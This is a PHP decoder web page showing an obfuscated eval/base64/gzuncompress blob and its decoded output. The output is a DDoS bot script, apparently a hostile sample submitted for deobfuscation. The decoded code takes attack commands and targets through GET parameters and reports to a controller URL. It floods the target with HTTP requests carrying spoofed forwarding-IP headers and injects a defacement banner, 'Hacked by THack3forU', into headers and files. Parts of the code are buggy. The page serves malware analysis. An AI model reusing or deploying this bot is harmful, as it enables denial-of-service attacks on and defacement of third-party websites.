Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? eval(gzuncompress(base64_decode('eF7tV+tu40QU/l+p7zAbRbJD7TRO2u42iYtC6l5oty3BK7qwyHLs48..
Decoded Output download
error_reporting(0);
$otstyk = $_GET['otstyk'];
$url = $_GET['url'];
$kl = $_GET['kl'];
$command = $_GET['command'];
function generateKey($lengt=9){
$chars='abdefhiknrstyzABDEFGHKNQRSTYZ23456789';
$numChars=strlen($chars);
$string='';
for($i=0;$i<$length;$i++){
$string.=substr($chars,rand(1,$numChars)-1,1);
}return $string;
}
generateKey(9);
$botid= "new ddos_bot(server) key="+$string;
if($command=='otstyk'){
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"Accept-language: en-us,en;q=0.5
" .
"Accept_charset: windows-1251, utf-8, utf-16;q=0.6, *;q=0.1" .
"Accept-Encoding: deflate, gzip, identity, *;q=0
" .
"referer:$botid Command otstyk execute!"
)
);
$context1 = stream_context_create($opts);
$file = file_get_contents($otstyk.'?log=log', false, $context1);
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"Accept-language: en-us,en;q=0.5
" .
"Accept_charset: windows-1251, utf-8, utf-16;q=0.6, *;q=0.1" .
"Accept-Encoding: deflate, gzip, identity, *;q=0
" .
"referer: $botid"
)
);
$context1 = stream_context_create($opts);
$file = file_get_contents($otstyk, false, $context1);
exit();
}
if($command=='ddos'){
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"Accept-language: en-us,en;q=0.5
" .
"Accept_charset: windows-1251, utf-8, utf-16;q=0.6, *;q=0.1" .
"Accept-Encoding: deflate, gzip, identity, *;q=0
" .
"referer:$botid Command ddos execute! Attack to $url requests: $kl"
)
);
$context1 = stream_context_create($opts);
$file = file_get_contents($otstyk.'?log=log', false, $context1);
for($x = 0; $x <= $kl; $x++){
$rd1=rand(100,999);
$rd2=rand(100,999);
$rd3=rand(100,999);
$rd4=rand(100,999);
$ip =$rd1.'.'.$rd2.'.'.$rd3.'.'.$rd4;
//
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"Accept-language: en-us,en;q=0.5
" .
"Accept_charset: windows-1251, utf-8, utf-16;q=0.6, *;q=0.1" .
"Accept-Encoding: deflate, gzip, identity, *;q=0
" .
"Connection: close
" .
"Keep-Alive: 300
" .
"Expires: Thu, 01 Jan 2017 00:00:01 GMT
" .
"Cache-Control: no-store, no-cache, must-revalidate
" .
"Pragma: no-cache
" .
"Referer: $url
" .
"User-Agent: <style> body{ background:red;color:black;}</style><center><h1>Hacked by THack3forU</h1></center><center><h2>You are Lamer...This site will been hacked!</h2></center>
" .
"X-FORWARDED-FOR:".ip .
"X-FORWARDED-FOR:".ip .
"Client-ip:".ip .
"Client-ip:".ip .
"X-REAL-IP:".ip .
"X-REAL-IP:".ip .
"CF-CONNECTING-IP:".ip .
"CF-CONNECTING-IP:".ip .
"REMOTE_ADRR:".ip .
"REMOTE_ADRR:".ip .
"HTTP_CF_CONNECTING_IP:".ip .
"HTTP_X_REAL_IP:".ip .
"HTTP_CLIENT_IP:".ip .
"HTTP_X_FORWARDED_FOR:".ip
)
);
$context = stream_context_create($opts);
$file = file_get_contents($url, false, $context);
}
}
if($command=='ddos2'){
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"Accept-language: en-us,en;q=0.5
" .
"Accept_charset: windows-1251, utf-8, utf-16;q=0.6, *;q=0.1" .
"Accept-Encoding: deflate, gzip, identity, *;q=0
" .
"referer:$botid Command ddos 2 execute! Attack to $url requests: $kl"
)
);
$context1 = stream_context_create($opts);
$file = file_get_contents($otstyk.'?log=log', false, $context1);
for($x = 0; $x <= $kl; $x++){
$f=fopen($url,'w');
}
}
if($command=='ddos3'){
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"Accept-language: en-us,en;q=0.5
" .
"Accept_charset: windows-1251, utf-8, utf-16;q=0.6, *;q=0.1" .
"Accept-Encoding: deflate, gzip, identity, *;q=0
" .
"referer:$botid Command ddos 3 execute! Attack to $url requests: $kl"
)
);
$context1 = stream_context_create($opts);
$file = file_get_contents($otstyk.'?log=log', false, $context1);
for($x = 0; $x <= $kl; $x++){
$attack=fopen($url,'a+');
$text=" <style> body{ background:red;color:black;}</style><center><h1>Hacked by THack3forU</h1></center><center><h2>You are Lamer...This site will been hacked!</h2></center>";
$write=fwrite($attack,$text.PHP_EOL);
fclose($list);
}
}Did this file decode correctly?
Original Code
<? eval(gzuncompress(base64_decode('eF7tV+tu40QU/l+p7zAbRbJD7TRO2u42iYtC6l5oty3BK7qwyHLs48SKM5Mdj9tmV31I3oAfICSEisQTcMZ2krKJ2S4sEqCmjTw+88035zpzApwz7nCYMC5COlBrldb6WpmJWExHxCRl59Cyv1Gyd+VbOZfwaDGBL5l0dE84ymUeG49d6i8mckE6GyTUEyGjZAAUuCvgBKZqOQI6EOZu5a1cPnR5bCpu34dgGI4oRx3edD7btw4Oj07Ovuh9ab/8ut7Y2t55+mxXkfvRZNxN18SCI5GaMaQGoQStMxWJCxhXy6FZa5XDdrbhEIcbG+mmGbBqxkkfhzmFxlFr1dDmO1R0QzMk8S0HkXBK8nVSsr5236LddPs+E6FvkhKFa+L7LHZQoMbAr4BXyAimZmljxkDW19bXwkCdec80Z96X+hH8lNlExOhUl3N3qkqZMhRioph7CwnKxiCGzEdpCX1f0nLpEFwfuJR2PA8mQo9cOkjcATQJUD2JNaCt12atuv2Kv6IlUs2WLT75Mif1C4gmuQ6pz65j3ahvGxpJRKA/yx7GTkq0o5FP0oFRzKZb1GM+Wt8kGOsIXaeRwZtwopHQBypCMc1JipTiEAAH3swcTbp54uVpDDfgJQKelOS6yvpaJUtOKuBGGOhI9Dy4YyeXOB6+CVBTN0sogoMwAgTKhzMAkUGpiNW8UqrKpxEbmPhVNBK4UYwGzHfIKuoxZu/QzGJGsqDdD87HDs/qmGBehEKtyIq7XS46WaZpyT2G7qHlJl02LzbSEcL1RkQwkl4ZHF4nEIsY4z2K/slgv7cW0/P/BilqLYLPtik1ksP8CuC+YWYHfq2m7e5mJzj366uEjVXCrWVhOCGmJK4q+CfJZoPGbLAl83Bzk3x399MP3//4C/n17re7nx+zbwVNl1EKae/QJF7EYigCngBM9E4UXqG9jVohn3UzCTlgYtrDRCM1g3zuUlKvGU9JrdaU/wY5fG4XauN6Q9BRJ8FZ1CSU6bFgHG3CkSfnNDJOYqFzuHKj0Edzi5guuDsYu835wiJcb35wYl0VgV5gd6F3sBPBqLWxLCLYI33mT9+SPlblgLOE+k0OfstjEePNfoTS1m17M4O2PVwIfK89NPaOcAZ80p8SWw4bWD4v2ps40d6coebo+t5LlmCuAjl1x8Cr1ao9DGMShwIwd6KI9AEoGaaMT5CkviApMuRSPzjvfdXp7Vv7ctQsVbGWHgojy+GKQtxPDydFRO8Cliku9Z7VOdWPLx6MWN7kQO+en51ZXfv47PAj4HrW83Pbcjr7vbnlZFmtZdQS5Mi2L5zugbPY1fkTO1P0pSONfS+se3psndlOsQ052TyMzjyMKy+Lv3lXYOks3Q6VrH2/XdUK1B97gQ/vBer/g24gMAM2kT8mZcYo18qsXyxoGRuPP9P+Wq40PjxX/mWZ4qZq/yFd3I0sX8qSxCyR/8ZVXEpVvuYINYP0oebGaakh1YujC8c6P01NC9IWTC1HYTw/QH8H5HspWQ=='))); ?>Function Calls
| gzuncompress | 1 |
| base64_decode | 1 |
Stats
| MD5 | e3884ab9a1c108624332b0b4d6e586b5 |
| Eval Count | 1 |
| Decode Time | 93 ms |